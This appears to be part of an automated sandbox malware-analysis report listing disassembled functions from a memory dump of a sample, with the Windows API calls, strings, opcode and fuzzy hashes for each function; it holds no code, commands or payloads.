                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                            • API String ID: 2820617543-1000479233
                                                                                                                            • Opcode ID: 8196a99c2082f77529fe862e8e0539256699b4f09448b3c4d43c5a7fdba4e47d
                                                                                                                            • Instruction ID: 6df6c7965e8f7ccf9642daadc54cd432ab71d784ff21be8e84fd8fa15d4afa40
                                                                                                                            • Opcode Fuzzy Hash: 8196a99c2082f77529fe862e8e0539256699b4f09448b3c4d43c5a7fdba4e47d
                                                                                                                            • Instruction Fuzzy Hash: 6751CD31548341ABC700EF14CC92AAFBBE5EF85754F04482DF896A72A2DB31DD09EA43
                                                                                                                            Function 00EE9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __i64tow__itow__swprintf
                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                            • API String ID: 421087845-2263619337
                                                                                                                            • Opcode ID: be1c315d4b1aeb6f8a05bd6a8f574cd0de26938dc5e410f8b4811ec3dad191da
                                                                                                                            • Instruction ID: 8845d60a00f43b2606c9910b190ea883d4c6162da5bcccf55a401e609552792a
                                                                                                                            • Opcode Fuzzy Hash: be1c315d4b1aeb6f8a05bd6a8f574cd0de26938dc5e410f8b4811ec3dad191da
                                                                                                                            • Instruction Fuzzy Hash: A9410631900209EFEB28DF35DC42EBA73E9EF06310F24447EE449E7292EA35D945AB11
                                                                                                                            Function 00F67152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F6716A
                                                                                                                            • CreateMenu.USER32 ref: 00F67185
                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00F67194
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F67221
                                                                                                                            • IsMenu.USER32(?), ref: 00F67237
                                                                                                                            • CreatePopupMenu.USER32 ref: 00F67241
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F6726E
                                                                                                                            • DrawMenuBar.USER32 ref: 00F67276
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                            • String ID: 0$F
                                                                                                                            • API String ID: 176399719-3044882817
                                                                                                                            • Opcode ID: 690f32d4b1612b4f8a77312014ff0382fb6acc2add1fdf7e31c9e07393d53c67
                                                                                                                            • Instruction ID: c3caf590988e2642650da66a37141c26247e112b9f27ebf39ac227ea0d491941
                                                                                                                            • Opcode Fuzzy Hash: 690f32d4b1612b4f8a77312014ff0382fb6acc2add1fdf7e31c9e07393d53c67
                                                                                                                            • Instruction Fuzzy Hash: C6416775A01209EFDB20EF64E894E9ABBB5FF09314F140029F916A7361D771AD14EF90
                                                                                                                            Function 00F674BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F6755E
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00F67565
                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F67578
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00F67580
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F6758B
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00F67594
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00F6759E
                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F675B2
                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F675BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                            • Opcode ID: 8e3d2c0f3caed9c661663e5e9d4b07ff7edff6689a7812cef43d11e06c9d3914
                                                                                                                            • Instruction ID: cebdc3d7f7e3860712842a5fdc64ad2310fba76c72c39bfd788a6d7b08f5326a
                                                                                                                            • Opcode Fuzzy Hash: 8e3d2c0f3caed9c661663e5e9d4b07ff7edff6689a7812cef43d11e06c9d3914
                                                                                                                            • Instruction Fuzzy Hash: 58319E72504218BBDF11AF64EC08FDB3B69FF09764F150224FA26A20A0C775DC15EBA0
                                                                                                                            Function 00F06E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F06E3E
                                                                                                                              • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00F06ED7
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00F06F0D
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00F06F2A
                                                                                                                            • __allrem.LIBCMT ref: 00F06F80
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F06F9C
                                                                                                                            • __allrem.LIBCMT ref: 00F06FB3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F06FD1
                                                                                                                            • __allrem.LIBCMT ref: 00F06FE8
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F07006
                                                                                                                            • __invoke_watson.LIBCMT ref: 00F07077
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 384356119-0
                                                                                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                            • Instruction ID: 9a2da056b497a3a57a78748c443813806efc6fa0a128d79e4d2fd5576c213b5b
                                                                                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                            • Instruction Fuzzy Hash: 567105B6E00717ABDB14EE68DC41B9AB7A8AF04374F148229F414E72C1E774ED50BB90
                                                                                                                            Function 00F42527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42542
                                                                                                                            • GetMenuItemInfoW.USER32(00FA5890,000000FF,00000000,00000030), ref: 00F425A3
                                                                                                                            • SetMenuItemInfoW.USER32(00FA5890,00000004,00000000,00000030), ref: 00F425D9
                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00F425EB
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00F4262F
                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00F4264B
                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00F42675
                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00F426BA
                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F42700
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F42714
                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F42735
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4176008265-0
                                                                                                                            • Opcode ID: d516ebd2c17970045d0bfb74500d648f4dacb582362ab4a5dc75239adde3e1d3
                                                                                                                            • Instruction ID: 16af945a34252ccf4011eb4cddc929b18fffffe4a996c3e29c08fcaf58fe2b59
                                                                                                                            • Opcode Fuzzy Hash: d516ebd2c17970045d0bfb74500d648f4dacb582362ab4a5dc75239adde3e1d3
                                                                                                                            • Instruction Fuzzy Hash: 9261BCB1900249AFDB51CF64DC88EBEBFB8EB01314F980169FC42A7291D775AD45EB21
                                                                                                                            Function 00F66F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F66FA5
                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F66FA8
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F66FCC
                                                                                                                            • _memset.LIBCMT ref: 00F66FDD
                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F66FEF
                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F67067
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 830647256-0
                                                                                                                            • Opcode ID: 69971109a46cf2b1d418ef9a62bf7108d2f494255ef7bceb393a2bea7b70f77d
                                                                                                                            • Instruction ID: f8b11dc62a164d9a32c03039198477f2831c05072c9a5b34ee4796865e9a805c
                                                                                                                            • Opcode Fuzzy Hash: 69971109a46cf2b1d418ef9a62bf7108d2f494255ef7bceb393a2bea7b70f77d
                                                                                                                            • Instruction Fuzzy Hash: 80617AB5900208AFDB11DFA4CC81EEE77F8EB09714F10015AFA15EB2A1D775AD45EBA0
                                                                                                                            Function 00F36B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F36BBF
                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00F36C18
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F36C2A
                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F36C4A
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00F36C9D
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F36CB1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F36CC6
                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00F36CD3
                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F36CDC
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F36CEE
                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F36CF9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2706829360-0
                                                                                                                            • Opcode ID: 2950ad06d3f583fb574363d85c202bbe2abfc258221fd6446948ce8cc28aede8
                                                                                                                            • Instruction ID: 8985c3a354d713928009412c2b247bd3d5171ee5260736a0d07fddf46c0dc24a
                                                                                                                            • Opcode Fuzzy Hash: 2950ad06d3f583fb574363d85c202bbe2abfc258221fd6446948ce8cc28aede8
                                                                                                                            • Instruction Fuzzy Hash: CB415071A0011DAFCF04DF69DC449AEBBB9EF48361F00C069E955E7261CB71A945DFA0
                                                                                                                            Function 00F55732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00F55793
                                                                                                                            • inet_addr.WSOCK32(?,?,?), ref: 00F557D8
                                                                                                                            • gethostbyname.WSOCK32(?), ref: 00F557E4
                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00F557F2
                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F55862
                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F55878
                                                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F558ED
                                                                                                                            • WSACleanup.WSOCK32 ref: 00F558F3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                            • String ID: Ping
                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                            • Opcode ID: b509886b40da110e42b333b7e4f401c4f5e040c11fdc25af6408e7d4d568fce3
                                                                                                                            • Instruction ID: 00cfa7c948152cdf17a36eee1552b25d9b17ef84aea0282db1ac5cdcc40ed3b7
                                                                                                                            • Opcode Fuzzy Hash: b509886b40da110e42b333b7e4f401c4f5e040c11fdc25af6408e7d4d568fce3
                                                                                                                            • Instruction Fuzzy Hash: 97518171A047049FDB10DF25DC55B2A7BE4EF49B21F048929FA56EB2A1DB70EC08EB41
                                                                                                                            Function 00F4B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00F4B4D0
                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F4B546
                                                                                                                            • GetLastError.KERNEL32 ref: 00F4B550
                                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00F4B5BD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                            • Opcode ID: 7aad55acfaff47de1f5e9d8d274162f9e650db1a7ba8f106fc7a0972e0718555
                                                                                                                            • Instruction ID: 37de07cf077a92d52aef20411a7443361bbe28a01be6d7870e6e66edf56f2b51
                                                                                                                            • Opcode Fuzzy Hash: 7aad55acfaff47de1f5e9d8d274162f9e650db1a7ba8f106fc7a0972e0718555
                                                                                                                            • Instruction Fuzzy Hash: 3831B235A00209DFDB00EF68D845EBDBBB4FF49350F184025E905E7296DB71DA02EB41
                                                                                                                            Function 00F38F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F39014
                                                                                                                            • GetDlgCtrlID.USER32 ref: 00F3901F
                                                                                                                            • GetParent.USER32 ref: 00F3903B
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F3903E
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00F39047
                                                                                                                            • GetParent.USER32(?), ref: 00F39063
                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F39066
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                            • Opcode ID: d9a6b147abf76b60b75843b3269798b669b409b6f5e94e082bec265c58b56df5
                                                                                                                            • Instruction ID: a29a38b1cae8f81c522b666d91d09cbee173ba2ba0e84e494fa39a1eff9b299a
                                                                                                                            • Opcode Fuzzy Hash: d9a6b147abf76b60b75843b3269798b669b409b6f5e94e082bec265c58b56df5
                                                                                                                            • Instruction Fuzzy Hash: 6821A775A04208BBDF05ABA1CC85EFEB7B5EF45320F100115F571972A1DBB55819EA21
                                                                                                                            Function 00F3907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F3AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F3AABC
                                                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F390FD
                                                                                                                            • GetDlgCtrlID.USER32 ref: 00F39108
                                                                                                                            • GetParent.USER32 ref: 00F39124
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F39127
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00F39130
                                                                                                                            • GetParent.USER32(?), ref: 00F3914C
                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F3914F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                            • Opcode ID: 3151fbe3c9451560e307cb77a8af736713fbc865f6630a63b9503060aa337eec
                                                                                                                            • Instruction ID: 011f44cfd9c9b86add272ec28cff98490c665d977c6e2f14a827b7ebd894236b
                                                                                                                            • Opcode Fuzzy Hash: 3151fbe3c9451560e307cb77a8af736713fbc865f6630a63b9503060aa337eec
                                                                                                                            • Instruction Fuzzy Hash: F121B875E04208BBDF05ABA5CC85EFEB7B4EF45310F104015F561A72A1DBB55819EA21
                                                                                                                            Function 00F39163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32 ref: 00F3916F
                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00F39184
                                                                                                                            • _wcscmp.LIBCMT ref: 00F39196
                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F39211
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                            • API String ID: 1704125052-3381328864
